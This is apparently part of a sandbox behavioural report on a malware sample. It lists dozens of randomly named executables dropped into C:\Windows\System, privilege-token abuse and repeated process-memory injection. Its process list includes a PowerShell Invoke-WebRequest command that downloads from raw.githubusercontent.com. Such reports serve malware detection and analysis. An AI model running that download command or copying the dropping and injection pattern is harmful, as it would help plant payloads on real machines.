File created C:\Windows\System\WaxZbXx.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\XVTSxIv.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\TfvQhUM.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\GlijgPq.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\ruFuVdi.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\CysOyxs.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\VOreHdD.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\TxQyaKD.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\cGWCsLQ.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\KSBqHDm.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\KDQYXaa.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\JWQVKPh.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\BfLOqaU.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\lCFKvhs.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\PLJMjOD.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\UFdZITU.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\OuaAJOV.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\xDFVQXy.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\DamgOiN.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\VMAdwnt.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\lypNvQo.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\mHtQIAx.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\yTPzumF.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\KNBgqHc.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\PUSdGuK.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\urJjBVh.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\RxOvXGk.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\pLDKrsv.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\XlKXpCM.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\zXsrXYN.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\ETWZGQf.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\hsVFLMX.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\gEjufJz.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\rzFvUqh.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\PhhfrgP.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\ivlpPaL.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\svZRnCB.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\nITLQeh.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\pVvyCTa.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\DxqjaRc.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\HRdYcMq.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\JgxjYJc.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\NCtebQe.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\yRXaLxB.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\DSUXRRX.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\IQJRekR.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\TEHRnSf.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\RKgxWkA.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
File created C:\Windows\System\xUGGZPg.exe C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3940 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3940 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3940 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\CysOyxs.exe
PID 3940 wrote to memory of 4860 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\CysOyxs.exe
PID 3940 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\OrrRtug.exe
PID 3940 wrote to memory of 2248 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\OrrRtug.exe
PID 3940 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\SQovDfo.exe
PID 3940 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\SQovDfo.exe
PID 3940 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\fDBNyfx.exe
PID 3940 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\fDBNyfx.exe
PID 3940 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\gJrKYYU.exe
PID 3940 wrote to memory of 4856 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\gJrKYYU.exe
PID 3940 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\AmdSLnc.exe
PID 3940 wrote to memory of 5004 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\AmdSLnc.exe
PID 3940 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\ZTeetps.exe
PID 3940 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\ZTeetps.exe
PID 3940 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\NSTnlVS.exe
PID 3940 wrote to memory of 3712 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\NSTnlVS.exe
PID 3940 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rjdwPsC.exe
PID 3940 wrote to memory of 4940 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\rjdwPsC.exe
PID 3940 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\wHCmOWC.exe
PID 3940 wrote to memory of 4028 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\wHCmOWC.exe
PID 3940 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\xsEjqQk.exe
PID 3940 wrote to memory of 1604 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\xsEjqQk.exe
PID 3940 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\quxsThd.exe
PID 3940 wrote to memory of 2352 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\quxsThd.exe
PID 3940 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\vaWeTar.exe
PID 3940 wrote to memory of 4484 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\vaWeTar.exe
PID 3940 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\dmQIdol.exe
PID 3940 wrote to memory of 2360 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\dmQIdol.exe
PID 3940 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\sjkRbnC.exe
PID 3940 wrote to memory of 1940 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\sjkRbnC.exe
PID 3940 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\VwxtFgm.exe
PID 3940 wrote to memory of 3204 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\VwxtFgm.exe
PID 3940 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\VDFHWSw.exe
PID 3940 wrote to memory of 2604 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\VDFHWSw.exe
PID 3940 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\dzHZXzu.exe
PID 3940 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\dzHZXzu.exe
PID 3940 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\Vapqwyk.exe
PID 3940 wrote to memory of 1472 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\Vapqwyk.exe
PID 3940 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\nnYjYoa.exe
PID 3940 wrote to memory of 3512 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\nnYjYoa.exe
PID 3940 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\iQZhPrV.exe
PID 3940 wrote to memory of 1240 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\iQZhPrV.exe
PID 3940 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\sGAqzsS.exe
PID 3940 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\sGAqzsS.exe
PID 3940 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\wchFWCt.exe
PID 3940 wrote to memory of 4944 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\wchFWCt.exe
PID 3940 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\grpsppv.exe
PID 3940 wrote to memory of 788 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\grpsppv.exe
PID 3940 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\cndSdfF.exe
PID 3940 wrote to memory of 1984 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\cndSdfF.exe
PID 3940 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\doYbrVO.exe
PID 3940 wrote to memory of 2884 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\doYbrVO.exe
PID 3940 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\AqqrKFW.exe
PID 3940 wrote to memory of 2476 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\AqqrKFW.exe
PID 3940 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\AOpddHT.exe
PID 3940 wrote to memory of 644 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\AOpddHT.exe
PID 3940 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\mYGfJGb.exe
PID 3940 wrote to memory of 3528 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\mYGfJGb.exe
PID 3940 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\CcUkXAS.exe
PID 3940 wrote to memory of 3240 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\CcUkXAS.exe
PID 3940 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\HKrmxif.exe
PID 3940 wrote to memory of 1884 N/A C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe C:\Windows\System\HKrmxif.exe

Processes

C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\31625d8a44f5d6bcb2e2c9c7620f8f90_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\CysOyxs.exe

C:\Windows\System\CysOyxs.exe

C:\Windows\System\OrrRtug.exe

C:\Windows\System\OrrRtug.exe

C:\Windows\System\SQovDfo.exe

C:\Windows\System\SQovDfo.exe

C:\Windows\System\fDBNyfx.exe

C:\Windows\System\fDBNyfx.exe

C:\Windows\System\gJrKYYU.exe

C:\Windows\System\gJrKYYU.exe

C:\Windows\System\AmdSLnc.exe

C:\Windows\System\AmdSLnc.exe

C:\Windows\System\ZTeetps.exe

C:\Windows\System\ZTeetps.exe

C:\Windows\System\NSTnlVS.exe

C:\Windows\System\NSTnlVS.exe

C:\Windows\System\rjdwPsC.exe

C:\Windows\System\rjdwPsC.exe

C:\Windows\System\wHCmOWC.exe

C:\Windows\System\wHCmOWC.exe

C:\Windows\System\xsEjqQk.exe

C:\Windows\System\xsEjqQk.exe

C:\Windows\System\quxsThd.exe

C:\Windows\System\quxsThd.exe

C:\Windows\System\vaWeTar.exe

C:\Windows\System\vaWeTar.exe

C:\Windows\System\dmQIdol.exe

C:\Windows\System\dmQIdol.exe

C:\Windows\System\sjkRbnC.exe

C:\Windows\System\sjkRbnC.exe

C:\Windows\System\VwxtFgm.exe

C:\Windows\System\VwxtFgm.exe

C:\Windows\System\VDFHWSw.exe

C:\Windows\System\VDFHWSw.exe

C:\Windows\System\dzHZXzu.exe

C:\Windows\System\dzHZXzu.exe

C:\Windows\System\Vapqwyk.exe

C:\Windows\System\Vapqwyk.exe

C:\Windows\System\nnYjYoa.exe

C:\Windows\System\nnYjYoa.exe

C:\Windows\System\iQZhPrV.exe

C:\Windows\System\iQZhPrV.exe

C:\Windows\System\sGAqzsS.exe

C:\Windows\System\sGAqzsS.exe

C:\Windows\System\wchFWCt.exe

C:\Windows\System\wchFWCt.exe

C:\Windows\System\grpsppv.exe

C:\Windows\System\grpsppv.exe

C:\Windows\System\cndSdfF.exe

C:\Windows\System\cndSdfF.exe

C:\Windows\System\doYbrVO.exe

C:\Windows\System\doYbrVO.exe

C:\Windows\System\AqqrKFW.exe

C:\Windows\System\AqqrKFW.exe

C:\Windows\System\AOpddHT.exe

C:\Windows\System\AOpddHT.exe

C:\Windows\System\mYGfJGb.exe

C:\Windows\System\mYGfJGb.exe

C:\Windows\System\CcUkXAS.exe

C:\Windows\System\CcUkXAS.exe

C:\Windows\System\HKrmxif.exe

C:\Windows\System\HKrmxif.exe

C:\Windows\System\sqkzUjB.exe

C:\Windows\System\sqkzUjB.exe

C:\Windows\System\qzNXzZX.exe

C:\Windows\System\qzNXzZX.exe

C:\Windows\System\QudWmhI.exe

C:\Windows\System\QudWmhI.exe

C:\Windows\System\MpaBtRz.exe

C:\Windows\System\MpaBtRz.exe

C:\Windows\System\cuaDZbj.exe

C:\Windows\System\cuaDZbj.exe

C:\Windows\System\DyeLlGe.exe

C:\Windows\System\DyeLlGe.exe

C:\Windows\System\RZxFSXk.exe

C:\Windows\System\RZxFSXk.exe

C:\Windows\System\HuOQcZI.exe

C:\Windows\System\HuOQcZI.exe

C:\Windows\System\FbOygah.exe

C:\Windows\System\FbOygah.exe

C:\Windows\System\ImsdVtJ.exe

C:\Windows\System\ImsdVtJ.exe

C:\Windows\System\ApkOqZC.exe

C:\Windows\System\ApkOqZC.exe

C:\Windows\System\PNwmbNz.exe

C:\Windows\System\PNwmbNz.exe

C:\Windows\System\DZRkWgc.exe

C:\Windows\System\DZRkWgc.exe

C:\Windows\System\Nqtjhxt.exe

C:\Windows\System\Nqtjhxt.exe

C:\Windows\System\HsanxJo.exe

C:\Windows\System\HsanxJo.exe

C:\Windows\System\EVkQepN.exe

C:\Windows\System\EVkQepN.exe

C:\Windows\System\KSHaUBO.exe

C:\Windows\System\KSHaUBO.exe

C:\Windows\System\BhkCIbE.exe

C:\Windows\System\BhkCIbE.exe

C:\Windows\System\MqCCqrT.exe

C:\Windows\System\MqCCqrT.exe

C:\Windows\System\xNVtWdw.exe

C:\Windows\System\xNVtWdw.exe

C:\Windows\System\NHEYKhZ.exe

C:\Windows\System\NHEYKhZ.exe

C:\Windows\System\KPZYmIH.exe

C:\Windows\System\KPZYmIH.exe

C:\Windows\System\euijXcP.exe

C:\Windows\System\euijXcP.exe

C:\Windows\System\apfTTKH.exe

C:\Windows\System\apfTTKH.exe

C:\Windows\System\lCpEHHa.exe

C:\Windows\System\lCpEHHa.exe

C:\Windows\System\TjGNyIY.exe

C:\Windows\System\TjGNyIY.exe

C:\Windows\System\IcqrUGS.exe

C:\Windows\System\IcqrUGS.exe

C:\Windows\System\iVdmTkc.exe

C:\Windows\System\iVdmTkc.exe

C:\Windows\System\TXObsHt.exe

C:\Windows\System\TXObsHt.exe

C:\Windows\System\sJWlyyt.exe

C:\Windows\System\sJWlyyt.exe

C:\Windows\System\ZhEBUZn.exe

C:\Windows\System\ZhEBUZn.exe

C:\Windows\System\XchTFlH.exe

C:\Windows\System\XchTFlH.exe

C:\Windows\System\eDGKVCW.exe

C:\Windows\System\eDGKVCW.exe

C:\Windows\System\CvbRmlh.exe

C:\Windows\System\CvbRmlh.exe

C:\Windows\System\hXSNkon.exe

C:\Windows\System\hXSNkon.exe

C:\Windows\System\NiAtVZL.exe

C:\Windows\System\NiAtVZL.exe

C:\Windows\System\eqrvIVc.exe

C:\Windows\System\eqrvIVc.exe

C:\Windows\System\NQgAjbl.exe

C:\Windows\System\NQgAjbl.exe

C:\Windows\System\gfCZABn.exe

C:\Windows\System\gfCZABn.exe

C:\Windows\System\IpSqmgC.exe

C:\Windows\System\IpSqmgC.exe

C:\Windows\System\KazajPU.exe

C:\Windows\System\KazajPU.exe

C:\Windows\System\GcuQaJd.exe

C:\Windows\System\GcuQaJd.exe

C:\Windows\System\bALNaVa.exe

C:\Windows\System\bALNaVa.exe

C:\Windows\System\oYWZEcj.exe

C:\Windows\System\oYWZEcj.exe

C:\Windows\System\ATuUklZ.exe

C:\Windows\System\ATuUklZ.exe

C:\Windows\System\yZrPZaQ.exe

C:\Windows\System\yZrPZaQ.exe

C:\Windows\System\jiqqBdI.exe

C:\Windows\System\jiqqBdI.exe

C:\Windows\System\zXkrCtR.exe

C:\Windows\System\zXkrCtR.exe

C:\Windows\System\kEQuuKG.exe

C:\Windows\System\kEQuuKG.exe

C:\Windows\System\jrWoiVp.exe

C:\Windows\System\jrWoiVp.exe

C:\Windows\System\wvOUAJg.exe

C:\Windows\System\wvOUAJg.exe

C:\Windows\System\uNDRTCM.exe

C:\Windows\System\uNDRTCM.exe

C:\Windows\System\mUXVZDq.exe

C:\Windows\System\mUXVZDq.exe

C:\Windows\System\mZKRvtY.exe

C:\Windows\System\mZKRvtY.exe

C:\Windows\System\KrbMsVp.exe

C:\Windows\System\KrbMsVp.exe

C:\Windows\System\SKXkMqp.exe

C:\Windows\System\SKXkMqp.exe

C:\Windows\System\iHJGzoH.exe

C:\Windows\System\iHJGzoH.exe

C:\Windows\System\lEhcacV.exe

C:\Windows\System\lEhcacV.exe

C:\Windows\System\tyaZmFC.exe

C:\Windows\System\tyaZmFC.exe

C:\Windows\System\sbRBjrJ.exe

C:\Windows\System\sbRBjrJ.exe

C:\Windows\System\UPIrvoD.exe

C:\Windows\System\UPIrvoD.exe

C:\Windows\System\ovMfiHf.exe

C:\Windows\System\ovMfiHf.exe

C:\Windows\System\LIVrwDb.exe

C:\Windows\System\LIVrwDb.exe

C:\Windows\System\UxFyHsa.exe

C:\Windows\System\UxFyHsa.exe

C:\Windows\System\mReaTkX.exe

C:\Windows\System\mReaTkX.exe

C:\Windows\System\jppNkHC.exe

C:\Windows\System\jppNkHC.exe

C:\Windows\System\pwXqPCi.exe

C:\Windows\System\pwXqPCi.exe

C:\Windows\System\hxhTeVF.exe

C:\Windows\System\hxhTeVF.exe

C:\Windows\System\xVKImiM.exe

C:\Windows\System\xVKImiM.exe

C:\Windows\System\sQEXdyp.exe

C:\Windows\System\sQEXdyp.exe

C:\Windows\System\PXfMuCO.exe

C:\Windows\System\PXfMuCO.exe

C:\Windows\System\dONxycP.exe

C:\Windows\System\dONxycP.exe

C:\Windows\System\RBVZOLi.exe

C:\Windows\System\RBVZOLi.exe

